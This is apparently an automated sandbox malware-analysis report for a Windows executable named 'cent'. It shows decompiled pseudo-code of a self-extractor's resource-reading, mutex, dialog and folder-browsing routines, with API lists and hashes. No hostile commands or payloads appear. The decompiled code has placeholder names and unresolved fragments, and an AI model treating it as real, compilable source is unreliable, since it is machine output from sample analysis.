                                                                                                                                                                                                        			E000C2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				struct HRSRC__* _t31;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t13 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                        				_t65 = 0;
                                                                                                                                                                                                        				_t66 = __ecx;
                                                                                                                                                                                                        				_t48 = __edx;
                                                                                                                                                                                                        				 *0xc9a3c = __ecx;
                                                                                                                                                                                                        				memset(0xc9140, 0, 0x8fc);
                                                                                                                                                                                                        				memset(0xc8a20, 0, 0x32c);
                                                                                                                                                                                                        				memset(0xc88c0, 0, 0x104);
                                                                                                                                                                                                        				 *0xc93ec = 1;
                                                                                                                                                                                                        				_t20 = E000C468F("TITLE", 0xc9154, 0x7f);
                                                                                                                                                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                        					_t64 = 0x4b1;
                                                                                                                                                                                                        					goto L32;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                        					 *0xc858c = _t27;
                                                                                                                                                                                                        					SetEvent(_t27);
                                                                                                                                                                                                        					_t64 = 0xc9a34;
                                                                                                                                                                                                        					if(E000C468F("EXTRACTOPT", 0xc9a34, 4) != 0) {
                                                                                                                                                                                                        						if(( *0xc9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                        							 *0xc9120 =  *0xc9120 & _t65;
                                                                                                                                                                                                        							if(E000C5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                        								if( *0xc8a3a == 0) {
                                                                                                                                                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xc8184 != 0) {
                                                                                                                                                                                                        										__imp__#17();
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xc8a24 == 0) {
                                                                                                                                                                                                        										_t57 = _t65;
                                                                                                                                                                                                        										if(E000C36EE(_t65) == 0) {
                                                                                                                                                                                                        											goto L33;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t33 =  *0xc9a40; // 0x3
                                                                                                                                                                                                        											_t48 = 1;
                                                                                                                                                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                        												if(( *0xc9a34 & 0x00000100) == 0 || ( *0xc8a38 & 0x00000001) != 0 || E000C18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t64 = 0x7d6;
                                                                                                                                                                                                        													if(E000C6517(_t57, 0x7d6, _t34, E000C19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L30:
                                                                                                                                                                                                        												_t23 = _t48;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t23 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E000C2390(0xc8a3a);
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t64 = 0x520;
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								E000C44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 =  &_v268;
                                                                                                                                                                                                        							if(E000C468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                        								 *0xc8588 = _t43;
                                                                                                                                                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(( *0xc9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                        										_t64 = 0x524;
                                                                                                                                                                                                        										if(E000C44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t64 = 0x54b;
                                                                                                                                                                                                        										E000C44B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										CloseHandle( *0xc8588);
                                                                                                                                                                                                        										 *0xc9124 = 0x800700b7;
                                                                                                                                                                                                        										goto L33;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t64 = 0x4b1;
                                                                                                                                                                                                        						E000C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						 *0xc9124 = 0x80070714;
                                                                                                                                                                                                        						L33:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x000c2cb5
                                                                                                                                                                                                        0x000c2cbc
                                                                                                                                                                                                        0x000c2cc7
                                                                                                                                                                                                        0x000c2cc9
                                                                                                                                                                                                        0x000c2cd1
                                                                                                                                                                                                        0x000c2cd3
                                                                                                                                                                                                        0x000c2cd9
                                                                                                                                                                                                        0x000c2ce9
                                                                                                                                                                                                        0x000c2cf9
                                                                                                                                                                                                        0x000c2d0e
                                                                                                                                                                                                        0x000c2d15
                                                                                                                                                                                                        0x000c2d1c
                                                                                                                                                                                                        0x000c2ef3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2d2d
                                                                                                                                                                                                        0x000c2d34
                                                                                                                                                                                                        0x000c2d3b
                                                                                                                                                                                                        0x000c2d40
                                                                                                                                                                                                        0x000c2d48
                                                                                                                                                                                                        0x000c2d59
                                                                                                                                                                                                        0x000c2d84
                                                                                                                                                                                                        0x000c2e1f
                                                                                                                                                                                                        0x000c2e1f
                                                                                                                                                                                                        0x000c2e2e
                                                                                                                                                                                                        0x000c2e41
                                                                                                                                                                                                        0x000c2e5a
                                                                                                                                                                                                        0x000c2e62
                                                                                                                                                                                                        0x000c2e6c
                                                                                                                                                                                                        0x000c2e6c
                                                                                                                                                                                                        0x000c2e75
                                                                                                                                                                                                        0x000c2e77
                                                                                                                                                                                                        0x000c2e77
                                                                                                                                                                                                        0x000c2e84
                                                                                                                                                                                                        0x000c2e8b
                                                                                                                                                                                                        0x000c2e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2e96
                                                                                                                                                                                                        0x000c2e96
                                                                                                                                                                                                        0x000c2e9e
                                                                                                                                                                                                        0x000c2ea2
                                                                                                                                                                                                        0x000c2eba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2ece
                                                                                                                                                                                                        0x000c2ede
                                                                                                                                                                                                        0x000c2eed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2eed
                                                                                                                                                                                                        0x000c2eef
                                                                                                                                                                                                        0x000c2eef
                                                                                                                                                                                                        0x000c2eef
                                                                                                                                                                                                        0x000c2eef
                                                                                                                                                                                                        0x000c2ea2
                                                                                                                                                                                                        0x000c2e86
                                                                                                                                                                                                        0x000c2e88
                                                                                                                                                                                                        0x000c2e88
                                                                                                                                                                                                        0x000c2e43
                                                                                                                                                                                                        0x000c2e48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2e48
                                                                                                                                                                                                        0x000c2e30
                                                                                                                                                                                                        0x000c2e30
                                                                                                                                                                                                        0x000c2ef8
                                                                                                                                                                                                        0x000c2f01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2f01
                                                                                                                                                                                                        0x000c2d8a
                                                                                                                                                                                                        0x000c2d8f
                                                                                                                                                                                                        0x000c2da1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2da3
                                                                                                                                                                                                        0x000c2dae
                                                                                                                                                                                                        0x000c2db4
                                                                                                                                                                                                        0x000c2dbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2dca
                                                                                                                                                                                                        0x000c2dd3
                                                                                                                                                                                                        0x000c2df5
                                                                                                                                                                                                        0x000c2e02
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2dd5
                                                                                                                                                                                                        0x000c2dde
                                                                                                                                                                                                        0x000c2de3
                                                                                                                                                                                                        0x000c2e04
                                                                                                                                                                                                        0x000c2e0a
                                                                                                                                                                                                        0x000c2e10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2e10
                                                                                                                                                                                                        0x000c2dd3
                                                                                                                                                                                                        0x000c2dbb
                                                                                                                                                                                                        0x000c2da1
                                                                                                                                                                                                        0x000c2d5b
                                                                                                                                                                                                        0x000c2d5b
                                                                                                                                                                                                        0x000c2d5d
                                                                                                                                                                                                        0x000c2d69
                                                                                                                                                                                                        0x000c2d6e
                                                                                                                                                                                                        0x000c2f06
                                                                                                                                                                                                        0x000c2f06
                                                                                                                                                                                                        0x000c2f06
                                                                                                                                                                                                        0x000c2d59
                                                                                                                                                                                                        0x000c2f18

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C2CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C2CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C2CF9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C2D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 000C2D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 000C2DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 000C2DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 000C2E0A
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                        • API String ID: 1002816675-2654900392
                                                                                                                                                                                                        • Opcode ID: 7b1fe9555b1d4c25e045cb41d5e3a97ad8e996658fc886479285938d15b4dbc2
                                                                                                                                                                                                        • Instruction ID: b6daed97b61684ed9727d58fd025b0b4867d786473d4704a896bcc5128790d41
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b1fe9555b1d4c25e045cb41d5e3a97ad8e996658fc886479285938d15b4dbc2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5051E370340305ABF764AB218C4AFBF36D8EB86704F14803DBA41E59E2DAB8C841C726
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E000C34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				struct HWND__* _t35;
                                                                                                                                                                                                        				struct HWND__* _t38;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t9 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *0xc91d8 = 1;
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                        					EndDialog();
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				_pop(1);
                                                                                                                                                                                                        				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                        					if(_a12 != 0x1b) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t13 = _t12 - 0xe;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t35 = _a4;
                                                                                                                                                                                                        					 *0xc8584 = _t35;
                                                                                                                                                                                                        					E000C43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                        					__eflags =  *0xc8184; // 0x1
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                        					_t17 = CreateThread(0, 0, E000C4FE0, 0, 0, 0xc8798);
                                                                                                                                                                                                        					 *0xc879c = _t17;
                                                                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						E000C44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t35);
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t23 = _t13 - 1;
                                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 2;
                                                                                                                                                                                                        					if(_a12 != 2) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					ResetEvent( *0xc858c);
                                                                                                                                                                                                        					_t38 =  *0xc8584; // 0x0
                                                                                                                                                                                                        					_t25 = E000C44B9(_t38, 0x4b2, 0xc1140, 0, 0x20, 4);
                                                                                                                                                                                                        					__eflags = _t25 - 6;
                                                                                                                                                                                                        					if(_t25 == 6) {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						 *0xc91d8 = 1;
                                                                                                                                                                                                        						SetEvent( *0xc858c);
                                                                                                                                                                                                        						_t39 =  *0xc879c; // 0x0
                                                                                                                                                                                                        						E000C3680(_t39);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t25 - 1;
                                                                                                                                                                                                        					if(_t25 == 1) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetEvent( *0xc858c);
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t23 == 0xe90) {
                                                                                                                                                                                                        					TerminateThread( *0xc879c, 0);
                                                                                                                                                                                                        					EndDialog(_a4, _a12);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x000c34fb
                                                                                                                                                                                                        0x000c34fe
                                                                                                                                                                                                        0x000c3665
                                                                                                                                                                                                        0x000c3666
                                                                                                                                                                                                        0x000c3666
                                                                                                                                                                                                        0x000c3668
                                                                                                                                                                                                        0x000c366e
                                                                                                                                                                                                        0x000c366e
                                                                                                                                                                                                        0x000c3671
                                                                                                                                                                                                        0x000c3671
                                                                                                                                                                                                        0x000c3677
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3677
                                                                                                                                                                                                        0x000c3504
                                                                                                                                                                                                        0x000c3506
                                                                                                                                                                                                        0x000c3507
                                                                                                                                                                                                        0x000c350c
                                                                                                                                                                                                        0x000c365b
                                                                                                                                                                                                        0x000c365f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3661
                                                                                                                                                                                                        0x000c3512
                                                                                                                                                                                                        0x000c3515
                                                                                                                                                                                                        0x000c35be
                                                                                                                                                                                                        0x000c35c1
                                                                                                                                                                                                        0x000c35d1
                                                                                                                                                                                                        0x000c35d8
                                                                                                                                                                                                        0x000c35de
                                                                                                                                                                                                        0x000c35f8
                                                                                                                                                                                                        0x000c3617
                                                                                                                                                                                                        0x000c3617
                                                                                                                                                                                                        0x000c3623
                                                                                                                                                                                                        0x000c3637
                                                                                                                                                                                                        0x000c363d
                                                                                                                                                                                                        0x000c3642
                                                                                                                                                                                                        0x000c3644
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3646
                                                                                                                                                                                                        0x000c3652
                                                                                                                                                                                                        0x000c3657
                                                                                                                                                                                                        0x000c3658
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3658
                                                                                                                                                                                                        0x000c3644
                                                                                                                                                                                                        0x000c351b
                                                                                                                                                                                                        0x000c351d
                                                                                                                                                                                                        0x000c354f
                                                                                                                                                                                                        0x000c3553
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c355f
                                                                                                                                                                                                        0x000c3565
                                                                                                                                                                                                        0x000c357c
                                                                                                                                                                                                        0x000c3581
                                                                                                                                                                                                        0x000c3584
                                                                                                                                                                                                        0x000c359b
                                                                                                                                                                                                        0x000c35a1
                                                                                                                                                                                                        0x000c35a7
                                                                                                                                                                                                        0x000c35ad
                                                                                                                                                                                                        0x000c35b3
                                                                                                                                                                                                        0x000c35b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c35b8
                                                                                                                                                                                                        0x000c3586
                                                                                                                                                                                                        0x000c3588
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3590
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3590
                                                                                                                                                                                                        0x000c3524
                                                                                                                                                                                                        0x000c3535
                                                                                                                                                                                                        0x000c3541
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3549
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 000C3535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 000C3541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 000C355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(000C1140,00000000,00000020,00000004), ref: 000C3590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000C35C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 000C35F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 000C35F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 000C3610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 000C3617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 000C3623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 000C3637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 000C3671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 2406144884-3940384054
                                                                                                                                                                                                        • Opcode ID: 0115ebd362917fd9e29fbcb39b394d2ac0b33ecf99883be528f81f3fc3a30351
                                                                                                                                                                                                        • Instruction ID: f587c8564049820cce4bfb7b8f8b98fea205f38d61f1e240b910546380c1acce
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0115ebd362917fd9e29fbcb39b394d2ac0b33ecf99883be528f81f3fc3a30351
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E131B031250304BBE7601F29EC4DF6F3AA8E786B05F18C52DFA02952E1CA798A00DB55
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E000C4224(char __ecx) {
                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				char* _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                        				char _t76;
                                                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                                        					_t63 = 0x4c2;
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					E000C44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                        				_v12 = _t26;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t63 = 0x4c1;
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                        				_v20 = _t28;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                        				_v16 = _t29;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t76 =  *0xc88c0; // 0x0
                                                                                                                                                                                                        				if(_t76 != 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					 *0xc87a0 = 0;
                                                                                                                                                                                                        					_v52 = _t67;
                                                                                                                                                                                                        					_v48 = 0;
                                                                                                                                                                                                        					_v44 = 0;
                                                                                                                                                                                                        					_v40 = 0xc8598;
                                                                                                                                                                                                        					_v36 = 1;
                                                                                                                                                                                                        					_v32 = E000C4200;
                                                                                                                                                                                                        					_v28 = 0xc88c0;
                                                                                                                                                                                                        					 *0xca288( &_v52);
                                                                                                                                                                                                        					_t32 =  *_v12();
                                                                                                                                                                                                        					if(_t71 != _t71) {
                                                                                                                                                                                                        						asm("int 0x29");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v12 = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						 *0xca288(_t32, 0xc88c0);
                                                                                                                                                                                                        						 *_v16();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *0xc88c0 != 0) {
                                                                                                                                                                                                        							E000C1680(0xc87a0, 0x104, 0xc88c0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xca288(_v12);
                                                                                                                                                                                                        						 *_v20();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
